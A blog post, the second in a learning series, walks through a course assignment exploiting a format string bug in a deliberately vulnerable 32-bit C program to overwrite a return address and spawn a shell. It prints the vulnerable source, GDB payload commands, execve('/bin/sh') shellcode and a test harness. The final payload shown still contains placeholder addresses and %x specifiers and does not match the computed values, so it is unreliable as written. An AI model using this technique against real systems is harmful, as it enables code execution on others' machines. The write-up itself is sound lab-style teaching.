DEV Community

Alexander Lee
Alexander Lee

Posted on

Journey to understand format string attack (Part 2)

Part 1:
https://dev.to/duracellrabbid/journey-to-understand-format-string-attack-part-1-5dda

In Part 1, one of the motivations that made me write these posts were because it took me a freaking long time to understand how format string attack works. To give you some context, I first knew about it in late 2021/early 2022. Took me a good 2.5 years to fully understand how it works. Still, I wanted to share my learning journey and where I eventually ended in.

The Task

Here, I will move on to talk about the assignment that helped propelled me into the journey. In my assignment, I was asked to run a shellcode using a "memory exploit" in the program. The source code was provided and it looked something like that:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int vul1(char *arg)
{
  char buffer[400];
  snprintf(buffer, sizeof buffer, arg);
  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "cstarget: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  vul1(argv[1]);

  return 0;
}
Enter fullscreen mode Exit fullscreen mode

The code can be compiled in gcc using the following flags:

-mpreferred-stack-boundary=2 -ggdb -m32 -L/usr/lib32 -fno-stack-protector
Enter fullscreen mode Exit fullscreen mode

Unfortunately, the source code and compilation flags were only for references. I had to perform the attack on the given binary, with ASLR turned off.

Analysis

First of all, we can see that the binary needs to run with one, and only one argument.

Then it will use snprintf to print this argument into a buffer of 400 chars. Initially, I thought this can be done using buffer overflow but snprintf is checking against the size of buffer. So this makes BoF attack unviable.

We are talking about format string vulnerabilities right? Guess what? We have snprintf!

snprintf does not produce an output. It basically prints the specified string till a specified length in the specified format to a buffer. A quick run on the binary with argument also confirms that.

No fear though! We have GDB. GDB is our friend. Let's bring along GEF for the ride as well.

Image description

Image description
From the screenshots, I noticed that buffer is at $esp. My return address is stored from +0x198 from buffer. In any case, I knew that the saved instruction address is 0x56556236.

The simplest approach is to have this address overridden to run my shellcode. Since the stack is executable, there are 3 potential places where I can run the shellcodes: buffer, arg and environment variables. I chose buffer as it is the easiest.

In addition, I observed one issue. Look at the screenshot where I planted 64 NOPs into the stack.

Image description

Note that the start of buffer changes as the size of the argument for vul1 increases. This is kind of expected. Remember my uglily drawn stack in Part 1:
Image description
Since parameters are placed before the return address, a parameter of bigger size will definitely push the stack further down.

Is that a concern for us? Yes and no. If we are not careful, the addresses that we need to write to will be wrong. However, if we formulate the format string right, we can get the addresses right where we want it.

The format string

In this round, my approach will be:

<shellcodes> + <NOP paddings> + <address1> + <address2> + %Ax%G$n%Bx%H$n
Enter fullscreen mode Exit fullscreen mode

Shellcode + NOPs = 64 bytes (you can try any number that is multiple of 4)
address1 = the stack memory address that holds the return address
address2 = basically address1 + 0x2
A = lower order of the starting address of buffer - 64 - 8
B = higher order of starting address of buffer - lower order of starting address of buffer
G = (64 / 4) + 1
H = G + 1

Sounds abstract? I guessed it. Let's use Excel to visualize the stack.

Image description

Few observations here:

  1. The shellcode is at the start of the buffer. This is because the starting address of the buffer is relatively easier to obtain. Not everyday is a Saturday, so when you get the chance to be lazy, you take it.
  2. The NOPs are there to align the stack. Imagine if we do not have the NOPs, this will happen

Image description

We will not be able to obtain the full addresses. Setting the NOP paddings assure us that our addresses will always be on the 17th and 18th position of the stack. (Take 1 position on the stack as 4 bytes, since we are working on 32 bits)

Finding the addresses

I like to break my tasks down into smaller pieces. Let's break the format string into steps.

  1. 64 NOPs - They are placeholders for the shellcode
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64)") 

Enter fullscreen mode Exit fullscreen mode

Image description

  1. 64 NOPs + the 2 placeholder addresses
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4)")
Enter fullscreen mode Exit fullscreen mode

Image description

  1. The entire format string in placeholder values
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4 + b'%12356x%17\$x%12345x%18\$x')")
Enter fullscreen mode Exit fullscreen mode

Image description

Image description

From here, we know that our shellcodes will start at 0xffffcdb4. We also know that the saved eip will be 0xffffcf4c. With these information:
address1 = \x4c\xcf\xff\xff
address2 = \x4e\xcf\xff\xff
A = 0xcdb4 - 72 = 52588
B = 0xffff - 0xcdb4 = 12875

The shellcode

For the purpose of the exercise, we will use the following shellcode from this article:

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
Enter fullscreen mode Exit fullscreen mode

The next question is, how do we know if the shellcode works? We can test it with a simple C program.

// Filename: shellcode.c
// Compile:  gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode

#include<stdio.h>
#include<string.h>

void callShell() {
        const char code[] = \
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        printf("Shellcode Length: %d\n", strlen(code));

        ((void(*)(void))code)();

}

void main()
{
        callShell();
}
Enter fullscreen mode Exit fullscreen mode

Image description

Nice, the length of the shellcode is 45, so we will just need 19 more NOPs to pad it. Some of you may have noticed that I could have just pad 3 more NOPs. But I like 64, so I go with 64.

shellcode + NOPs = \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90

The full format string should be:

\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\xff\xee\xee\xee\xee%12345x%17$x%12345x%18$x
Enter fullscreen mode Exit fullscreen mode

Now we will test it out:

Image description

Image description

YES! A shell is opened. Mission accomplished? Not quite. There are more to the assignment, but it is beyond the scope of this write-up.

...One more thing

In essence, this should not be a difficult exercise for most seasoned CTF players. However, it is easy to get segmentation faults when working with format string attacks. It will be frustrating for beginners like me. I found that, the best thing to do is to break the tasks down into smaller pieces, and figure the smaller pieces individually.

To quote Dr Andrew Wiles: I think I'll stop here.

Top comments (0)